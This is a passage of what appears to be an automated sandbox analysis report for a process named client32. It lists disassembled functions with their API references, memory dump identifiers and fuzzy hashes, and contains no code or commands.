                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID: nslsp.dll
                                                                              • API String ID: 1029625771-3933918195
                                                                              • Opcode ID: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                              • Instruction ID: c3cee1b6b22d45073264887edccfc8dbbb46eef3a7360ad418ef0f3f90be1ef1
                                                                              • Opcode Fuzzy Hash: e245dc8b85a007af01e470ee7c18d2676676128a69ad62e56e432da1ca6298b9
                                                                              • Instruction Fuzzy Hash: BBC08C702006245BE3900F48BC04081F694AF04900300882AE070C3600D160A8008F80
                                                                              Function 11075090 Relevance: 3.1, APIs: 2, Instructions: 80COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110750EF
                                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,?,00000000,0000000B,?), ref: 11075159
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeLibrary_memset
                                                                              • String ID:
                                                                              • API String ID: 1654520187-0
                                                                              • Opcode ID: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                              • Instruction ID: 75615663fc9b5e204bff5cdf828812fccbd9a8c0715bb2e01743ee940980502e
                                                                              • Opcode Fuzzy Hash: 4e56bc08cf6d4b85bc31047bf59587d3794f3c6155dff5afacd053865e97b66c
                                                                              • Instruction Fuzzy Hash: 28219276E01268A7D710DE95EC41BEFBBBCFB44315F4041AAE90997200EB729A50CBE1
                                                                              Function 6EEF5C90 Relevance: 3.1, APIs: 2, Instructions: 66COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ioctlsocket.WSOCK32(910C34B3,4004667F,00000000,-000397EB), ref: 6EEF5D1F
                                                                              • select.WSOCK32(00000001,?,00000000,?,00000000,910C34B3,4004667F,00000000,-000397EB), ref: 6EEF5D62
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ioctlsocketselect
                                                                              • String ID:
                                                                              • API String ID: 1457273030-0
                                                                              • Opcode ID: aed06a3d12a9ac42703fe9798e701e89d046e27cf5af1ea0a750254151e49b41
                                                                              • Instruction ID: b3bf303c071388ff37d4c6653572151c3319099248a18a701f3711e32115e43a
                                                                              • Opcode Fuzzy Hash: aed06a3d12a9ac42703fe9798e701e89d046e27cf5af1ea0a750254151e49b41
                                                                              • Instruction Fuzzy Hash: BC210E71A012189BEB28CF54C9647EDB7B9EF88304F4085DAE80D97281DB755F94DF90
                                                                              Function 1105F7C0 Relevance: 3.0, APIs: 2, Instructions: 47COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _malloc_memmove
                                                                              • String ID:
                                                                              • API String ID: 1183979061-0
                                                                              • Opcode ID: 5b978a5cc2cdba63a64411b19136718d8af37a4e7f400d0beed470777af2abcc
                                                                              • Instruction ID: e8b2e2ab67b960fffb59418ca6d045486158c88f9a02fc8ea8f4f968a4d4dde1
                                                                              • Opcode Fuzzy Hash: 5b978a5cc2cdba63a64411b19136718d8af37a4e7f400d0beed470777af2abcc
                                                                              • Instruction Fuzzy Hash: A3F02879A002566F8701CF2C9844897FBDCEF4A25831480A6E849CB302D671EC15C7F0
                                                                              Function 110886C0 Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 110886DF
                                                                              • InitializeCriticalSection.KERNEL32(0000E3D0,00000000,?,11070CC3,00000000,00000000,11182F3E,000000FF), ref: 11088750
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalInitializeSection_memset
                                                                              • String ID:
                                                                              • API String ID: 453477542-0
                                                                              • Opcode ID: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                              • Instruction ID: 67e0870afe33de0d146d23e59662f9f8cfec19dbcaf4764f519a7c8a3238bf1f
                                                                              • Opcode Fuzzy Hash: b70e1f074512ce2ced997d39b2297f4199a589ff9b013c872d54b649f42912e3
                                                                              • Instruction Fuzzy Hash: CC1157B1901B148FC3A4CF7A99816C3FAE5BB58354F90892E95EEC2600DB756564CF90
                                                                              Function 11145010 Relevance: 3.0, APIs: 2, Instructions: 34windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 11145031
                                                                              • ExtractIconExA.SHELL32(?,00000000,00030417,00020437,00000001), ref: 11145068
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExtractFileIconModuleName
                                                                              • String ID:
                                                                              • API String ID: 3911389742-0
                                                                              • Opcode ID: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                              • Instruction ID: 51784f3a6cc6e5149e616e04a2eb2c6e0d372b09ba8f06c96ffc5d3ba3765e1d
                                                                              • Opcode Fuzzy Hash: 6ebcb2ed19ff45d4e03ce3bb4affc9ea6a4a037fcd6ce03922cabf34851b5b2f
                                                                              • Instruction Fuzzy Hash: F5F0BB79A4411C5FE718DFA0CC51FF9B36AE784709F444269E956D61C4CE70594CC741
                                                                              Function 11164C77 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1116A1AF: __getptd_noexit.LIBCMT ref: 1116A1AF
                                                                              • __lock_file.LIBCMT ref: 11164CBE
                                                                                • Part of subcall function 1116BE59: __lock.LIBCMT ref: 1116BE7E
                                                                              • __fclose_nolock.LIBCMT ref: 11164CC9
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 2800547568-0
                                                                              • Opcode ID: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                              • Instruction ID: afac539be2367be23e5fb54bb350a7e23aa7a519b2fcc5708fa11322496ce6e3
                                                                              • Opcode Fuzzy Hash: 271288d31555c81154ec7293090fb485e1e9931888df87aecff959c56407cd41
                                                                              • Instruction Fuzzy Hash: B4F0F0358017138AD7109B78CC0078EFBE96F0133CF1182088434AA6D4CBFA6521DB46
                                                                              Function 6EF06C1E Relevance: 3.0, APIs: 2, Instructions: 30sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 6EF06C26
                                                                              • Sleep.KERNEL32(00000064), ref: 6EF06C5B
                                                                                • Part of subcall function 6EF06940: GetTickCount.KERNEL32 ref: 6EF06950
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$Sleep
                                                                              • String ID:
                                                                              • API String ID: 4250438611-0
                                                                              • Opcode ID: d22d5c368796a1d0a36d984b7d673d684ab0d3dae756d03bf9fb27a43a7a8e1e
                                                                              • Instruction ID: 4cda0678c36ee49af4bae6f97d83ef50b2b17702c45ee4ee0f171705ca4854bc
                                                                              • Opcode Fuzzy Hash: d22d5c368796a1d0a36d984b7d673d684ab0d3dae756d03bf9fb27a43a7a8e1e
                                                                              • Instruction Fuzzy Hash: F3F0B432634904CBCF64EFE48574358B297DB9231AF12042BE80286D80D77048C0E791
                                                                              Function 1117602D Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • __lock.LIBCMT ref: 11176045
                                                                                • Part of subcall function 1117459F: __mtinitlocknum.LIBCMT ref: 111745B5
                                                                                • Part of subcall function 1117459F: __amsg_exit.LIBCMT ref: 111745C1
                                                                                • Part of subcall function 1117459F: EnterCriticalSection.KERNEL32(?,?,?,1116C592,0000000D), ref: 111745C9
                                                                              • __tzset_nolock.LIBCMT ref: 11176056
                                                                                • Part of subcall function 1117594C: __lock.LIBCMT ref: 1117596E
                                                                                • Part of subcall function 1117594C: ____lc_codepage_func.LIBCMT ref: 111759B5
                                                                                • Part of subcall function 1117594C: __getenv_helper_nolock.LIBCMT ref: 111759D7
                                                                                • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A0E
                                                                                • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A15
                                                                                • Part of subcall function 1117594C: __malloc_crt.LIBCMT ref: 11175A1C
                                                                                • Part of subcall function 1117594C: _strlen.LIBCMT ref: 11175A32
                                                                                • Part of subcall function 1117594C: _strcpy_s.LIBCMT ref: 11175A40
                                                                                • Part of subcall function 1117594C: __invoke_watson.LIBCMT ref: 11175A55
                                                                                • Part of subcall function 1117594C: _free.LIBCMT ref: 11175A64
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__mtinitlocknum__tzset_nolock_strcpy_s
                                                                              • String ID:
                                                                              • API String ID: 1828324828-0
                                                                              • Opcode ID: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                              • Instruction ID: d808ca63efd1e9ffab5fb640758e365785c4d1c524b5d003c7d68937386cb31b
                                                                              • Opcode Fuzzy Hash: e9fe97314170dd3ace1c63e43c84978c6283960cf81703fd067dc8cc761c8193
                                                                              • Instruction Fuzzy Hash: 7AE05B7E8877B3DAE7139FB4469060CF670AB05B3EF6011E5D060556C4CF701555C792
                                                                              Function 6EEF63A0 Relevance: 3.0, APIs: 2, Instructions: 10sleepnetworkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • WSACancelBlockingCall.WSOCK32 ref: 6EEF63A9
                                                                              • Sleep.KERNEL32(00000032), ref: 6EEF63B3
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3404478841.000000006EEF1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6EEF0000, based on PE: true
                                                                              • Associated: 00000004.00000002.3404460740.000000006EEF0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404517766.000000006EF30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404538676.000000006EF39000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404562350.000000006EF3E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404604288.000000006EF40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_6eef0000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: BlockingCallCancelSleep
                                                                              • String ID:
                                                                              • API String ID: 3706969569-0
                                                                              • Opcode ID: 98f1154b01cd20286259d3ed0cfa01cfed614a04858f7130e6b945d2f8ae7960
                                                                              • Instruction ID: e2ead802e893d1b06c155903e02f4a78c8b81285eefdecee1ce9801aeab8db27
                                                                              • Opcode Fuzzy Hash: 98f1154b01cd20286259d3ed0cfa01cfed614a04858f7130e6b945d2f8ae7960
                                                                              • Instruction Fuzzy Hash: F5B092B02B21138BAB4013F1091639A308E0FD424FF6008652A45C8485FF60C101A0E1
                                                                              Function 11145A70 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11145990: ExpandEnvironmentStringsA.KERNEL32(000000FF,?,00000104,000000FF), ref: 111459B7
                                                                                • Part of subcall function 11164EAD: __fsopen.LIBCMT ref: 11164EBA
                                                                              • GetLastError.KERNEL32(?,00000000,000000FF,?), ref: 11145AA5
                                                                              • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,00000000,000000FF,?), ref: 11145AB5
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                              • String ID:
                                                                              • API String ID: 3768737497-0
                                                                              • Opcode ID: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                              • Instruction ID: 034c310a398a014eacf4d95463f41bd89d414178975837bd0fbb5aed6b89dd46
                                                                              • Opcode Fuzzy Hash: a3a7e4752acc607997ac4dc0a72fcac428bfa81aec4d9fb6ca4c049ea981d30d
                                                                              • Instruction Fuzzy Hash: E8110476940319ABEB119F90CDC4A6FF3B8EF85A29F300165EC0097A00D775AD51C7A2
                                                                              Function 11010AE0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 11010B94
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LockitLockit::_std::_
                                                                              • String ID:
                                                                              • API String ID: 3382485803-0
                                                                              • Opcode ID: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                              • Instruction ID: 6fbf298b81733ad5c02794b6394837a2ddc0a350229d48e3ddb53e27456ddbdc
                                                                              • Opcode Fuzzy Hash: 900fd30ae7a6edcb6a0dfa434b7c013aaa35b72064ad6defd4f97f4d13ad8da4
                                                                              • Instruction Fuzzy Hash: F1516B74A00649DFDB04CF98C980AADFBF5BF89318F248298D5469B385C776E942CB90
                                                                              Function 1100E300 Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
